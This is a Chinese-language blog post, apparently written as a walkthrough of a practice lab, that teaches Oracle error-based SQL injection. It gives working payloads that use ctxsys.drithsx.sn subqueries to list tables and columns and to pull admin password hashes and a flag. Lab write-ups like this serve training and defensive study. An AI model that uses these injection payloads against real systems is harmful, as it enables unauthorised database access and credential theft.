<!DOCTYPE html>
<html lang="en">
    <head>
    <meta charset="utf-8">

    

    <!-- 渲染优化 -->
    <meta name="renderer" content="webkit">
    <meta name="force-rendering" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="HandheldFriendly" content="True" >
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <!--icon-->

    
        <link rel="shortcut icon" href="/img/assets/0922.ico">
    
    
    
    
    


    <!-- meta -->


<title>oracle注入报错注入oracle注入报错注入 | niu&#39;s blog</title>





    <!-- OpenGraph -->
 
    <meta name="description" content="oracle注入报错注入原理：同MYSQL数据库差不多，但是一些语法不同，相比其他数据库，oracle注入报错注入数据库的数据类型更加严谨，由于过度严谨，所以，我们用显错注入，会比较麻烦，于是，我们利用报错的方法，忽视数据类型，直接获取数据CTXSYS.DRITHSX.SN(user,()) oracle注入报错注入 基本的语法：select from all_tables 查询出所有的表 sel">
<meta property="og:type" content="article">
<meta property="og:title" content="oracle注入报错注入oracle注入报错注入">
<meta property="og:url" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="niu&#39;s blog">
<meta property="og:description" content="oracle注入报错注入原理：同MYSQL数据库差不多，但是一些语法不同，相比其他数据库，oracle注入报错注入数据库的数据类型更加严谨，由于过度严谨，所以，我们用显错注入，会比较麻烦，于是，我们利用报错的方法，忽视数据类型，直接获取数据CTXSYS.DRITHSX.SN(user,()) oracle注入报错注入 基本的语法：select from all_tables 查询出所有的表 sel">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/01.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/02.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/03.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/04.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/05.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/06.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/07.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/08.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/09.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/10.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/11.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/12.png">
<meta property="og:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/13.png">
<meta property="article:published_time" content="2021-09-02T14:49:57.913Z">
<meta property="article:modified_time" content="2021-09-03T02:17:24.446Z">
<meta property="article:author" content="Peter Niu">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://uruz24.github.io/2021/09/02/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/01.png">


    
<link rel="stylesheet" href="/css/style/main.css">
 

    
    
        <link rel="stylesheet" id="hl-default-theme" href="/css/highlight/default.css" media="none" >
        
            <link rel="stylesheet" id="hl-dark-theme" href="/css/highlight/dark.css" media="none">
        
    

    
    

    
    
<link rel="stylesheet" href="/css/style/dark.css">

    
<script src="/js/darkmode.js"></script>



     

    <!-- custom head -->

<meta name="generator" content="Hexo 5.4.0"></head>

    <body>
        <div id="app">
            <header class="header">
    <div class="header__left">
        <a href="/" class="button">
            <span class="logo__text">Niu&#39;s blog</span>
        </a>
    </div>
    <div class="header__right">
        
            <div class="navbar__menus">
                
                    <a href="/" class="navbar-menu button">首页</a>
                
                    <a href="/tags/" class="navbar-menu button">标签</a>
                
                    <a href="/archives/" class="navbar-menu button">归档</a>
                
                    <a href="/friends/" class="navbar-menu button">友链</a>
                
                    <a href="/page/" class="navbar-menu button">Page</a>
                
            </div>
        
        
        

        
        
    <a href="javaScript:void(0);" id="btn-toggle-dark">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path></svg>
    </a>


        
            <a class="dropdown-icon button" id="btn-dropdown" tabindex="0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" width='24' height='24' fill="none" stroke="currentColor" stroke-width="0.7" stroke-linecap="round" stroke-linejoin="round"><path fill="currentColor" d="M3.314,4.8h13.372c0.41,0,0.743-0.333,0.743-0.743c0-0.41-0.333-0.743-0.743-0.743H3.314c-0.41,0-0.743,0.333-0.743,0.743C2.571,4.467,2.904,4.8,3.314,4.8z M16.686,15.2H3.314c-0.41,0-0.743,0.333-0.743,0.743s0.333,0.743,0.743,0.743h13.372c0.41,0,0.743-0.333,0.743-0.743S17.096,15.2,16.686,15.2z M16.686,9.257H3.314c-0.41,0-0.743,0.333-0.743,0.743s0.333,0.743,0.743,0.743h13.372c0.41,0,0.743-0.333,0.743-0.743S17.096,9.257,16.686,9.257z"></path></svg></a>
            <div class="dropdown-menus" id="dropdown-menus">
                
                    <a href="/" class="dropdown-menu button">首页</a>
                
                    <a href="/tags/" class="dropdown-menu button">标签</a>
                
                    <a href="/archives/" class="dropdown-menu button">归档</a>
                
                    <a href="/friends/" class="dropdown-menu button">友链</a>
                
                    <a href="/page/" class="dropdown-menu button">Page</a>
                
            </div>
        
    </div>
</header>


            <main class="main">
    

<div class="post-title">
    <h1 class="post-title__text">
        oracle注入报错注入oracle注入报错注入
    </h1>
    <div class="post-title__meta">
        <a href="/archives/2021/09/" class="post-meta__date button">2021-09-02</a>
        
 
        
    
    


 

 
    </div>
</div>



<article class="post content-card">
    <div class="post__header"></div>
    <div class="post__content">
        <h4 id="oracle注入报错注入原理："><a href="#oracle注入报错注入原理：" class="headerlink" title="oracle注入报错注入原理："></a>oracle注入报错注入原理：</h4><p>同MYSQL数据库差不多，但是一些语法不同，相比其他数据库，oracle注入报错注入数据库的数据类型更加严谨，由于过度严谨，所以，我们用显错注入，会比较麻烦，于是，我们利用报错的方法，忽视数据类型，直接获取数据<code>CTXSYS.DRITHSX.SN(user,())</code></p>
<h4 id="oracle注入报错注入-基本的语法："><a href="#oracle注入报错注入-基本的语法：" class="headerlink" title="oracle注入报错注入 基本的语法："></a>oracle注入报错注入 基本的语法：</h4><p><code>select from all_tables</code> 查询出所有的表</p>
<p><code>select from user_tables</code> 查询出当前用户的表</p>
<p><code>select from all_tab_columns</code> 查询出所有的字段</p>
<p><code>select from user_tab_columns</code> 查询出当前用户的字段</p>
<p><code>select * from v$version</code> 查版本</p>
<p>mssql系统默认库、表 <code>sysobjects</code>、<code>syscolumns</code> 、<code>sysdatabases</code></p>
<p>sql系统默认库、表 <code>information_schema.tables</code> 、<code>information_schema.columns</code></p>
<p>oracel 系统默认库、表 <code>user_table dual</code><br>Dual是一个实表（也有人说它是虚表），如果你直接查询它，它只显示一个X，列名为DUMMY</p>
<h4 id="dual-虚表"><a href="#dual-虚表" class="headerlink" title="dual 虚表"></a>dual 虚表</h4><p>因为语法要求在查询时一定要加表名<br>例如：<br><code>select 1,2,3,4,5 from dual</code>这样就不会报错，用于把语法补全<br>oracle注入报错注入弱化了库的概念，一个用户可以简单理解为一个库</p>
<h4 id="本节难点："><a href="#本节难点：" class="headerlink" title="本节难点："></a>本节难点：</h4><p>如何实现limit 功能？<br>oracle注入报错注入 中利用<code>rownum=1</code>可以取一行数据</p>
<p>当<code>rownum&lt;3</code>可以取两条</p>
<p>当 <code>rownum&lt;5</code>可以取四条<br>rownum 的值会根据查询结果进行改变<br>语句如下可以完成limit功能<br><code>select username from(select rownum r, username from all users) where r=1</code><br>子查询返回一个结果集，结果集也可以看作是一个表，其中‘r’表示一个别名，在这一句中就是rownum的别名</p>
<p>进入靶场<br>发现id传参，and 1=1，网页显示正常</p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/01.png" alt="01"></p>
<p><code>and 1=2</code> 报错，表示与数据库有交互</p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/02.png" alt="02"><br>查字段，<br><code>order by 4</code> 显示正常</p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/03.png" alt="03"></p>
<p><code>order by 5</code> 报错，有4个字段</p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/04.png" alt="04"></p>
<p>联合查询,因为oracle注入报错注入数据库对数据类型要求很严格，所以使用语句<br><code>union all select null,null,null,null from dual</code> </p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/05.png" alt="05"><br>下面使用oracle注入报错注入方法</p>
<h4 id="优点："><a href="#优点：" class="headerlink" title="优点："></a>优点：</h4><p>可以不考虑类型</p>
<h4 id="原理："><a href="#原理：" class="headerlink" title="原理："></a>原理：</h4><p>在数据库中对查询相应的关键词，然后查询失败，爆出数据</p>
<h4 id="函数：ctxsys-drithsx-sn-user-select-banner-from-v-version-where-rownum-1"><a href="#函数：ctxsys-drithsx-sn-user-select-banner-from-v-version-where-rownum-1" class="headerlink" title="函数：ctxsys.drithsx.sn(user,(select banner from v$version where rownum=1))"></a>函数：<code>ctxsys.drithsx.sn(user,(select banner from v$version where rownum=1))</code></h4><p>这个函数就是一个查询，而子查询优先进行，所以当查询函数查不到的时候，就会报错，但是我们真正要的数据在子查询里已经查过了，通过报错显示出来<br>查表名<br><code>and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))</code></p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/06.png" alt="06"><br>得到表名NEWS<br>查其他表<br><code>and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name &lt;&gt;&#39;NEWS&#39;))</code></p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/07.png" alt="07"></p>
<p>得到ADMIN表<br>查字段<br><code>and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name=&#39;ADMIN&#39; and rownum=1))</code></p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/08.png" alt="08"><br>得到ID 字段<br>查其他字段<br><code>and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where  rownum=1 and table_name =&#39;ADMIN&#39; and column_name&lt;&gt;&#39;ID&#39;))</code></p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/09.png" alt="09"><br>得到字段UNAME<br>再查其他字段<br><code>and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where  rownum=1 and table_name =&#39;ADMIN&#39; and column_name&lt;&gt;&#39;ID&#39; and  column_name&lt;&gt;&#39;UNAME&#39;))</code></p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/10.png" alt="10"><br>得到字段UPASS<br>查内容<br><code>and 1=ctxsys.drithsx.sn(1,(select UPASS from ADMIN where rownum=1 ))</code></p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/11.png" alt="11"><br>得到数据：<code>f583aea84b6ded258f529205eb6d56a7</code><br>继续查其他数据<br><code>and 1=ctxsys.drithsx.sn(1,(select UPASS from ADMIN where rownum=1 and UPASS &lt;&gt; &#39;f583aea84b6ded258f529205eb6d56a7&#39;))</code></p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/12.png" alt="12"><br>试过发现这个也不是flag，继续<br><code>and 1=ctxsys.drithsx.sn(1,(select UPASS from ADMIN where rownum=1 and UPASS &lt;&gt; &#39;f583aea84b6ded258f529205eb6d56a7&#39; and UPASS &lt;&gt;  &#39;9e8e7f6953dd11ceccc6ce655e03e070&#39;))</code></p>
<p><img src="oracle%E6%B3%A8%E5%85%A5%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/13.png" alt="13"><br>得到flag：<br><code>2a61f8bcfe7535eadcfa69eb4406ceb9</code><br>输入通关</p>

    </div>
     
    <div class="post-footer__meta"><p>updated at 2021-09-03</p></div> 
    <div class="post-entry__tags"></div> 
</article>


    <div class="nav">
        <div class="nav__prev">
            
        </div>
        <div class="nav__next">
            
                <a href="/2021/09/02/vim%E7%BB%88%E7%AB%AF%E7%BC%96%E8%BE%91%E5%99%A8/" class="nav__link">
                    <div>
                        <div class="nav__label">
                            Next Post
                        </div>
                        <div class="nav__title">
                            vim终端编辑器
                        </div>
                    </div>
                    <div>
                        <svg viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="24" height="24"><path d="M434.944 790.624l-45.248-45.248L623.04 512l-233.376-233.376 45.248-45.248L713.568 512z" fill="#808080"></path></svg>
                    </div>
                </a>
            
        </div>
    </div>





</main>

            <footer class="footer">
     
    <a href="#" class="button" id="b2t" aria-label="Back to Top" title="Back to Top">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024" width="32" height="32">
            <path d="M233.376 722.752L278.624 768 512 534.624 745.376 768l45.248-45.248L512 444.128zM192 352h640V288H192z" fill="currentColor"></path>
        </svg>
    </a>

    


    
     
 

 
    
        
        <p class="footer-copyright">
            Copyright © 2021 <a href="/">niu&#39;s blog</a>
        </p>
    
    
    <p>Powered by <a href="https://hexo.io" target="_blank">Hexo</a> | Theme - <a href="https://github.com/ChrAlpha/hexo-theme-cards" target="_blank">Cards</a></p>
</footer>

        </div>
         

 

 

 

 



 



 


    
 

 

 

 

 

 




    </body>
</html>
